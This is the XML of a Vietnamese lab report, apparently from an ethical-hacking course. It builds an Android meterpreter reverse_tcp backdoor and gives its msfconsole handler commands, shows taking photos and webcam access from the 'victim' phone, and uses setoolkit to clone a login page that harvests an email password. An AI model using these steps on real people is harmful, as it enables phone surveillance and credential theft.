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62450" w14:textId="46EED475" w:rsidR="00063180" w:rsidRPr="00063180" w:rsidRDefault="00063180" w:rsidP="00063180">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hack Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D4E6A" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="54B52DB0" w14:textId="471BFF48" w:rsidR="00A44E48" w:rsidRDefault="00634C90">
      <w:r>
        <w:t>B1:</w:t>
      </w:r>
      <w:r w:rsidR="008E2727">
        <w:t xml:space="preserve"> Tạo file apk để gửi cho máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E037E96" w14:textId="048B66F3" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693AE4F3" wp14:editId="136E2B9A">
            <wp:extent cx="5669771" cy="3193057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5419" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="07E7B683" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="532DFF8B" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="7EE59B3E" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="0B32AEE9" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="15238EA7" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="5AE45B78" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="61E7EDD0" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="73A450A4" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="555A3120" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="3A05B0C2" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="41058F0A" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="69E8CAB6" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="2D7D29AC" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="64808B78" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="045509E1" w14:textId="5F0910D6" w:rsidR="00634C90" w:rsidRDefault="00634C90"/>
    <w:p w14:paraId="0E20C332" w14:textId="574E6A11" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00063180">
        <w:t>2: msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C73CF4" w14:textId="4E7A30DC" w:rsidR="00063180" w:rsidRDefault="00063180">
      <w:r w:rsidRPr="00063180">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B1480E" w14:textId="01C72D85" w:rsidR="00063180" w:rsidRDefault="00063180">
      <w:r w:rsidRPr="00063180">
        <w:t>set payload android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE68973" w14:textId="41356743" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEC10E7" wp14:editId="415173AA">
            <wp:extent cx="5128704" cy="68966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2684" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="55570A9D" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="19410753" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="3D5BEC0A" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="302A06AA" w14:textId="77777777" w:rsidR="00063180" w:rsidRDefault="00063180"/>
    <w:p w14:paraId="618F61FE" w14:textId="541797FD" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00063180">
        <w:t>3:</w:t>
      </w:r>
      <w:r w:rsidR="00FA237D">
        <w:t xml:space="preserve"> set lhost &lt;ip máy kali</w:t>
      </w:r>
      <w:r w:rsidR="004852C3">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB6836B" w14:textId="42BBCB25" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B43A9E8" wp14:editId="4DDA1747">
            <wp:extent cx="4930567" cy="552497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BBA4" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="6BF9A9EB" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="5359680C" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="29A8EDCF" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="3B3ADA3F" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="5BBDD93B" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="464BB185" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="748D1F4C" w14:textId="77777777" w:rsidR="004852C3" w:rsidRDefault="004852C3"/>
    <w:p w14:paraId="1D536EFE" w14:textId="24D5B6AE" w:rsidR="00407E87" w:rsidRDefault="00634C90">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="004852C3">
        <w:t>4: trên máy android tải và cài đặt phần mềm apk ở bước 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1B443" w14:textId="35CDF1BA" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F2BD30" wp14:editId="33A4B5DB">
            <wp:extent cx="5760085" cy="4122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2F1B" w14:textId="1A6A3914" w:rsidR="00407E87" w:rsidRDefault="00407E87">
      <w:r w:rsidRPr="00407E87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781C79DF" wp14:editId="0810EA10">
            <wp:extent cx="5760085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71A0" w14:textId="55D89556" w:rsidR="00634C90" w:rsidRDefault="00B650C1">
      <w:r>
        <w:t>B5</w:t>
      </w:r>
      <w:r w:rsidR="00634C90">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DA62FE">
        <w:t xml:space="preserve"> sysinfo : xem thông tín máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD4D47" w14:textId="39641D67" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1141B58D" wp14:editId="13798EB3">
            <wp:extent cx="5760085" cy="1572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D0FC" w14:textId="5E683A22" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B650C1">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DA62FE">
        <w:t xml:space="preserve"> Tải 1 tấm hình trong máy nạn nhân</w:t>
      </w:r>
      <w:r w:rsidR="001172E4">
        <w:t xml:space="preserve"> về máy kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0A2D8" w14:textId="5486CB4E" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1200B9C3" wp14:editId="468E19F6">
            <wp:extent cx="5760085" cy="1983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607A" w14:textId="1627E68C" w:rsidR="00634C90" w:rsidRDefault="00634C90">
      <w:r w:rsidRPr="00634C90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3DDE70" wp14:editId="3D4E51B4">
            <wp:extent cx="5760085" cy="1918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5716" w14:textId="6E4DB2BE" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="35CF155D" w14:textId="647371D1" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="3BE24162" w14:textId="71F31A00" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="16396432" w14:textId="32C57EBF" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="5D9C4225" w14:textId="4EA280B3" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="4B302526" w14:textId="110DFFA5" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="61151270" w14:textId="0071470E" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="14BF9AF0" w14:textId="15A79B2B" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="59F88584" w14:textId="2E2706B0" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="2A38551F" w14:textId="4E264F2B" w:rsidR="003B3366" w:rsidRDefault="003B3366"/>
    <w:p w14:paraId="2EB7F459" w14:textId="72693E5F" w:rsidR="003B3366" w:rsidRDefault="003B3366">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hack we</w:t>
      </w:r>
      <w:r w:rsidR="00097078">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>_cam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130DF51" w14:textId="6AF3F1A7" w:rsidR="00933794" w:rsidRDefault="00933794">
      <w:r w:rsidRPr="005701AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B8A7B98" wp14:editId="61173D38">
            <wp:extent cx="5760085" cy="4403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B86D" w14:textId="5E5C2615" w:rsidR="001172E4" w:rsidRDefault="001172E4"/>
    <w:p w14:paraId="102DD078" w14:textId="6C821A8F" w:rsidR="001172E4" w:rsidRDefault="001172E4">
      <w:r>
        <w:t>Ngoài ra còn các chức năng khác như: tải thông tin danh bạ, tin nhắn, khi syslog,……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641C254" w14:textId="33C8FD63" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="40AD95E2" w14:textId="5E5BCD8D" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="02E97AE2" w14:textId="521BEFB7" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="14C8217E" w14:textId="5CB9995E" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="573D86A3" w14:textId="6E62ECBC" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="6420DA1C" w14:textId="5B5C6113" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="02050E3E" w14:textId="17000910" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="7768688D" w14:textId="7B7FF3D6" w:rsidR="00065955" w:rsidRDefault="00065955"/>
    <w:p w14:paraId="49EBCD82" w14:textId="03754DA2" w:rsidR="00B946FE" w:rsidRDefault="00B946FE">
      <w:r>
        <w:t>Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E032A4" w14:textId="59F29285" w:rsidR="00065955" w:rsidRDefault="00065955">
      <w:r>
        <w:t xml:space="preserve">Lấy thông tin </w:t>
      </w:r>
      <w:r w:rsidR="00B946FE">
        <w:t xml:space="preserve">email </w:t>
      </w:r>
      <w:r>
        <w:t>người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6EE19" w14:textId="77777777" w:rsidR="007B3520" w:rsidRDefault="00065955" w:rsidP="007B3520">
      <w:r>
        <w:t>B1:</w:t>
      </w:r>
      <w:r w:rsidR="007B3520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19449CFA" w14:textId="20A8FC6A" w:rsidR="00065955" w:rsidRDefault="007B3520" w:rsidP="007B3520">
      <w:r>
        <w:t>setoolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894D40D" w14:textId="191D2278" w:rsidR="00065955" w:rsidRDefault="00065955">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1,2,3,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA2BD4" w14:textId="76918798" w:rsidR="00065955" w:rsidRDefault="00EC0958">
      <w:r w:rsidRPr="00EC0958">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D3C5DF1" wp14:editId="7A5CA064">
            <wp:extent cx="5760085" cy="7096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6C7B" w14:textId="77777777" w:rsidR="00055DA9" w:rsidRDefault="00055DA9"/>
    <w:p w14:paraId="1A6BFFCA" w14:textId="77777777" w:rsidR="00055DA9" w:rsidRDefault="00055DA9"/>
    <w:p w14:paraId="480BD724" w14:textId="10578E9E" w:rsidR="00055DA9" w:rsidRDefault="00055DA9">
      <w:r>
        <w:t>B2:  nhập địa chỉ ip của máy kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A070916" w14:textId="153F2F40" w:rsidR="00055DA9" w:rsidRDefault="00055DA9">
      <w:r w:rsidRPr="00055DA9">
        <w:t>http://certifiedhacker.com/Online%20Booking/index.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6246A" w14:textId="1EE0B46C" w:rsidR="00055DA9" w:rsidRDefault="00286291">
      <w:r w:rsidRPr="00286291">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25DD476F" wp14:editId="6692F6A0">
            <wp:extent cx="5760085" cy="4901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4583" w14:textId="3BF7C9E9" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="2C09CD62" w14:textId="0F18E4FF" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="4915CD8C" w14:textId="7BFF7593" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="124E8AB5" w14:textId="6A2BF06F" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="32B3B262" w14:textId="32CF2E32" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="512C10C6" w14:textId="228C6941" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="7FAE969C" w14:textId="67D4E11F" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="6CCD453D" w14:textId="19E63358" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="2F4C65F3" w14:textId="20EFF0D9" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="2FF778F1" w14:textId="43E793A9" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="261899A1" w14:textId="18CA8A29" w:rsidR="003F322F" w:rsidRDefault="003F322F"/>
    <w:p w14:paraId="2D23041D" w14:textId="652D0B2A" w:rsidR="003F322F" w:rsidRDefault="00AB661A">
      <w:r>
        <w:t>Task 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C123449" w14:textId="77777777" w:rsidR="00AB661A" w:rsidRDefault="00AB661A"/>
    <w:p w14:paraId="6A8E701E" w14:textId="757023EF" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="6A1F7D62" w14:textId="551A18A7" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="6530A8C4" w14:textId="16C748D6" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="76420737" w14:textId="5E1BC223" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="69F3ADFA" w14:textId="446633ED" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="1FE2D85A" w14:textId="5C92B296" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="02D9FFAF" w14:textId="0032923A" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="2F2070A6" w14:textId="0A8E55E9" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1"/>
    <w:p w14:paraId="05611549" w14:textId="55A17E83" w:rsidR="005E6BC1" w:rsidRDefault="005E6BC1">
      <w:r>
        <w:t xml:space="preserve">B3: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F5A28" w14:textId="29E3BF47" w:rsidR="001F4F0C" w:rsidRDefault="001F4F0C">
      <w:r w:rsidRPr="001F4F0C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212DE162" wp14:editId="03B52A85">
            <wp:extent cx="5760085" cy="3246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F631" w14:textId="5E3D059D" w:rsidR="0054743F" w:rsidRDefault="0054743F">
      <w:r w:rsidRPr="0054743F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D83A9C7" wp14:editId="1E1D4F5E">
            <wp:extent cx="5760085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2FB3" w14:textId="22EBD3CD" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="4C2916EB" w14:textId="5F611F18" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="2BF2C0E0" w14:textId="1ADE0D18" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="53A922A4" w14:textId="1AA2CE03" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="72C61A29" w14:textId="34E68544" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="0A934A9D" w14:textId="4FA21265" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05"/>
    <w:p w14:paraId="17A890B9" w14:textId="4A555DEE" w:rsidR="00DF0B05" w:rsidRDefault="00DF0B05">
      <w:r>
        <w:t>Nạn nhân nhấn vào link sẽ hiện ra như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F51A16" w14:textId="17E6C359" w:rsidR="004273C6" w:rsidRDefault="004273C6">
      <w:r w:rsidRPr="004273C6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E284AEC" wp14:editId="6B74E955">
            <wp:extent cx="5760085" cy="3245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E276" w14:textId="46BAA86B" w:rsidR="00D626F7" w:rsidRDefault="00D626F7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Người dùng đăng nhập tài khoản email vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636452A3" w14:textId="58FC92A0" w:rsidR="00CB6890" w:rsidRDefault="00CB6890">
      <w:r w:rsidRPr="00CB6890">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC8AAFE" wp14:editId="425999F5">
            <wp:extent cx="5760085" cy="3240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ED2C" w14:textId="3544A426" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7"/>
    <w:p w14:paraId="255A26B0" w14:textId="0E8B0276" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7"/>
    <w:p w14:paraId="05EA1827" w14:textId="00AD34E3" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7"/>
    <w:p w14:paraId="0FD29C18" w14:textId="1DBAFDF8" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7"/>
    <w:p w14:paraId="29ADC962" w14:textId="0B136BDD" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7"/>
    <w:p w14:paraId="55E7B63B" w14:textId="65DEDA7A" w:rsidR="00EE27B7" w:rsidRDefault="00EE27B7">
      <w:r>
        <w:t>Sau khi người dùng đặng nhập xong sẽ bị thông báo lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23215F06" w14:textId="17400247" w:rsidR="0022551E" w:rsidRDefault="0022551E">
      <w:r w:rsidRPr="0022551E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA40BF4" wp14:editId="32BD6FD5">
            <wp:extent cx="5760085" cy="3240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5ED0" w14:textId="020F6998" w:rsidR="00CB6890" w:rsidRDefault="00EE27B7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tk và mk email của người dùng đã bị lộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD5155" w14:textId="615168F5" w:rsidR="00287F8A" w:rsidRDefault="006717F8">
      <w:r w:rsidRPr="006717F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F935AEC" wp14:editId="1E792FD5">
            <wp:extent cx="5760085" cy="1173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582C" w14:textId="7227494D" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="68340D73" w14:textId="2FF4E5FF" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="61282CB8" w14:textId="5D487AD0" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="409C73F3" w14:textId="4D190AD1" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="54C0D016" w14:textId="03FBC5DF" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="6CE2A25F" w14:textId="4D7C16B7" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="2C803C3B" w14:textId="4E935D6D" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="06740F12" w14:textId="2D72CB4E" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="27EE37CB" w14:textId="78DF3305" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="25B54393" w14:textId="35EE2283" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="0BAED9B4" w14:textId="4DE28743" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="066BEA03" w14:textId="74FD324E" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="307FC389" w14:textId="307D3982" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="4F1408CB" w14:textId="4EA2220C" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="3D00F915" w14:textId="6960627C" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="31AF104E" w14:textId="24115156" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="476A1148" w14:textId="4B25C41B" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="02E12E8F" w14:textId="13C3C2E6" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="5818A5B5" w14:textId="4499EB6B" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="5FE93977" w14:textId="114E8305" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="0C0502CE" w14:textId="37493DDA" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="0FD6A3B3" w14:textId="3852B2CA" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="57A1C207" w14:textId="739D6DCB" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="7989EA1F" w14:textId="3AE79E53" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="1494571C" w14:textId="19DE82AC" w:rsidR="008D61EB" w:rsidRDefault="008D61EB"/>
    <w:p w14:paraId="0847CE7D" w14:textId="5BDDAD47" w:rsidR="008D61EB" w:rsidRDefault="008D61EB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D6983" w14:textId="3DFA6A0B" w:rsidR="00EA09F6" w:rsidRDefault="00EA09F6">
      <w:r>
        <w:t>Ceh10tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2EFB4" w14:textId="68019865" w:rsidR="00EA09F6" w:rsidRDefault="0095123D">
      <w:r w:rsidRPr="0095123D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E45D75B" wp14:editId="1C00699F">
            <wp:extent cx="5760085" cy="3240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820" w14:textId="1417893E" w:rsidR="00682B36" w:rsidRDefault="00682B36"/>
    <w:p w14:paraId="56C87033" w14:textId="6285485D" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="2E3610F2" w14:textId="6B34E2BC" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="66EB49CB" w14:textId="6B7AE88E" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="65387A6F" w14:textId="42BDCF10" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="06BD7162" w14:textId="2CB3648A" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="7924D4DA" w14:textId="15069D6B" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="39D1CCD7" w14:textId="40AC2C12" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="282391D2" w14:textId="779DF29D" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="01715C43" w14:textId="74ED271E" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="49028D41" w14:textId="01F1D673" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="35BCB978" w14:textId="2423F336" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="12361518" w14:textId="3FD3EF38" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="408D0558" w14:textId="7D12DE2D" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="57E2630D" w14:textId="22FEC98F" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="238732A4" w14:textId="14AE8031" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="05789DA3" w14:textId="7F4434C7" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="76A9A9D4" w14:textId="65E52DD0" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="241B71E3" w14:textId="4BECC577" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="55604251" w14:textId="68DD0054" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="01628DBB" w14:textId="3CE3F209" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
    <w:p w14:paraId="0FC91878" w14:textId="30BC6054" w:rsidR="002A23B1" w:rsidRDefault="002A23B1"/>
